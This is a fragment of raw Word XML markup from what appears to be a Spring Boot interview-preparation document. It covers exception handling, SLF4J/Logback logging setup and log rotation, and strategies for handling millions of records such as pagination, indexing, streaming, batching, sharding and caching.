            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C247489"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D978EAD"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e</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="334FF2C8" w14:textId="77777777" w:rsidTr="00AE6404">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A1CAD2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 @ExceptionHandler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="392AA02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lobal exception handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="414E531A" w14:textId="77777777" w:rsidTr="00AE6404">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D21B5FB"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="314F111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ST APIs (returns JSON)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="5E95FDB8" w14:textId="77777777" w:rsidTr="00AE6404">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74D6E07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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="726D1A4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ean and meaningful exception types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="4728C9C6" w14:textId="77777777" w:rsidTr="00AE6404">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B33534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ExceptionHandler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B0EF06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ing validation errors in form submissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="7DF86F02" w14:textId="77777777" w:rsidTr="00AE6404">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D199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lt;?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DFBBFC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trol HTTP response codes and messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BB86BDE" w14:textId="1522194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697" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46222305" w14:textId="5E55A377" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0CE0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="668" w:name="_Toc197867882"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How are you keeping track of logs in your project</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="668"/>
    </w:p>
    <w:p w14:paraId="4FAE658D" w14:textId="2AE7B567" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E1629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our Spring Boot project, we manage and track logs using the following structured approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707A9F3F"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EF61E">
          <v:rect id="_x0000_i2698" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C299A"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SLF4J with Logback (Default Logging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14BA3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Logback</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the default logging framework with </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SLF4J</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the facade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C38651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the Logger interface to write logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8BC58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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F269F0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Factory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AF52C4" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C06FBC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F5BB3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481BF01E" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D77F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atic final Logger logger = LoggerFactory.getLogger(EmployeeController.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50359CE3" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D0806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60DB351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gt; getEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5490208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ogger.info("Fetching employee with ID: {}", id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D845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service.findById(id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0B8DA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46C79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62D57A"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34AE46">
          <v:rect id="_x0000_i2699" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A46E07"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izing Log Levels via application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DF209"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root=INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB27E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com.myapp=DEBUG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D967A4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file.name=logs/myapp.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE83F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pattern.console=%d{yyyy-MM-dd HH:mm:ss} %-5level %logger{36} - %msg%n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037A343D"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70F3">
          <v:rect id="_x0000_i2700" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0232CBE6"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Log File Rotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C4F1D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back supports log rotation to avoid large log files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7DF9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In logback-spring.xml --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACB50D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 class="ch.qos.logback.core.rolling.TimeBasedRollingPolicy"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E9FB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fileNamePattern&gt;logs/myapp-%d{yyyy-MM-dd}.log&lt;/fileNamePattern&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4F7BE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xHistory&gt;30&lt;/maxHistory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47522B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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364D90B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0FD2A1">
          <v:rect id="_x0000_i2701" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B6973F"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4. Centralized Logging (Optional in Production)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD53E0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production, we often integrate with centralized logging systems like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B8785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LK Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Elasticsearch, Logstash, Kibana)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED82A3"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aylog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B989A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lunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E358E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uentd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D5C84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 CloudWatch</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (if deployed on AWS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B71B83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llows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B40CA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al-time log search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A55A528"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shboards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AD9E2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erts based on log patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29987DC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00E61">
          <v:rect id="_x0000_i2702" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1F208D"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3347"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="17365917" w14:textId="77777777" w:rsidTr="00E16296">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77309D75"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evel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F158259"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 Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="6F7C403A" w14:textId="77777777" w:rsidTr="00E16296">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B0489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ACE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="180E165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tailed, step-by-step tracing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="40CAE332" w14:textId="77777777" w:rsidTr="00E16296">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CB8E07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BUG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B88F92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during development</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="667D0722" w14:textId="77777777" w:rsidTr="00E16296">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="427ADE7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FO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB4506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 events like start/stop, endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="3D50958C" w14:textId="77777777" w:rsidTr="00E16296">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6587987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ARN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF0E36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tential issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="556FF950" w14:textId="77777777" w:rsidTr="00E16296">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5785FF5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RROR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AA275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s and failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AB2A24C" w14:textId="4FE6E7E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703" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F2BFE7" w14:textId="054D89FF" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00347A87">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="669" w:name="_Toc197867883"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If you have millions of data then how will you manage it</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="669"/>
    </w:p>
    <w:p w14:paraId="59AC5B37" w14:textId="55467442" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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nage </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>millions of records</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> efficiently in a Spring Boot application, we use a combination of </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database strategi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ode optimization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infrastructure tuning</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44342A5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D1438">
          <v:rect id="_x0000_i2704" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="204931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gination &amp; Sorting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330B829E"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Data JPA's PagingAndSortingRepository</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Pageable interface to load data in chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9EC73B"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ge&lt;Employee&gt; getAllEmployees(Pageable pageable) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E087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pageable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA8660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05EBA16"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employees?page=0&amp;size=50&amp;sort=name,asc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D15C9E3"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D84F5">
          <v:rect id="_x0000_i2705" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EEF8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Database Indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CED3C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proper </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on columns used in WHERE, ORDER BY, and JOIN clauses to speed up queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9EBBA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INDEX idx_employee_department ON employee(department_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7690D684"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71F6">
          <v:rect id="_x0000_i2706" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D828DA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Streaming Large Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0480F15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PA Stream</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DBC ResultSet streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to process huge results without loading everything in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B7A73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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D96D88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eam&lt;Employee&gt; streamAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFE5E7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member to </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>close the stream</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> after use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7A820C"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EAC4BB">
          <v:rect id="_x0000_i2707" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DBF495"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Batch Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2642B31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processing large datasets in background jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DD9E0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atures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0515A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unk-based reading/writing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C01E8"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ry/fault-tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F81E62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cheduling &amp; parallel execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0566CA26"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8A1605">
          <v:rect id="_x0000_i2708" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365C9D4"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Async Processing &amp; Queues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FCA26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data-intensive operations, offload work using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F03CB0"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ync methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5506E8"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RabbitMQ, or ActiveMQ (messaging queues)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6AA0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BA0B8">
          <v:rect id="_x0000_i2709" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE5ADC7"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6. Database Partitioning &amp; Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02487FF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tion large tables based on time/region/user_id to distribute the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3261E3F3"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hard data across multiple databases or tables if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072A41D"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1AA0E">
          <v:rect id="_x0000_i2710" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="790EDE4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7. Caching Frequently Used Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A72197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Cache</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Redis, Caffeine, or EhCache to reduce DB load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1646E13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cheable("employeeSummary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3839BFC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Summary getSummary(Long id) { ... }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A804C15"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75B48D">
